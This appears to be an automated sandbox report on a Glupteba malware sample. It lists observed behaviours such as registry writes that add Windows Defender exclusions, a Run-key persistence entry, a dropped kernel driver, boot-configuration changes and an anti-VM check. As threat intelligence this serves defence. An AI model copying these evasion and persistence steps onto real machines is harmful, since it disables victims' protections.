Analysis Overview
SHA256
a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39
Threat Level: Known bad
The file a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39 was found to be: Known bad.
Malicious Activity Summary
Windows security bypass
Glupteba
Glupteba payload
Modifies boot configuration data using bcdedit
Drops file in Drivers directory
Possible attempt to disable PatchGuard
Modifies Windows Firewall
Loads dropped DLL
UPX packed file
Executes dropped EXE
Windows security modification
Manipulates WinMonFS driver.
Adds Run key to start application
Checks installed software on the system
Manipulates WinMon driver.
Drops file in System32 directory
Drops file in Windows directory
Launches sc.exe
Checks for VirtualBox DLLs, possible anti-VM trick
Command and Scripting Interpreter: PowerShell
Modifies system certificate store
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Suspicious behavior: EnumeratesProcesses
GoLang User-Agent
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-09 23:20
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-09 23:20
Reported
2024-05-09 23:25
Platform
win7-20240221-en
Max time kernel
292s
Max time network
299s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\Winmon.sys | C:\Windows\rss\csrss.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe | N/A |
| N/A | N/A | C:\Windows\windefender.exe | N/A |
| N/A | N/A | C:\Windows\windefender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe | N/A |
Loads dropped DLL
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks installed software on the system
Manipulates WinMon driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMon | C:\Windows\rss\csrss.exe | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| File created | C:\Windows\Logs\CBS\CbsPersist_20240509232011.cab | C:\Windows\system32\makecab.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-41 = "E. South America Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-562 = "SE Asia Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-471 = "Ekaterinburg Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-12 = "Azores Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-872 = "Pakistan Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-651 = "AUS Central Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-192 = "Mountain Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-71 = "Newfoundland Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-232 = "Hawaiian Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-432 = "Iran Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-572 = "China Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-372 = "Jerusalem Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | C:\Windows\windefender.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
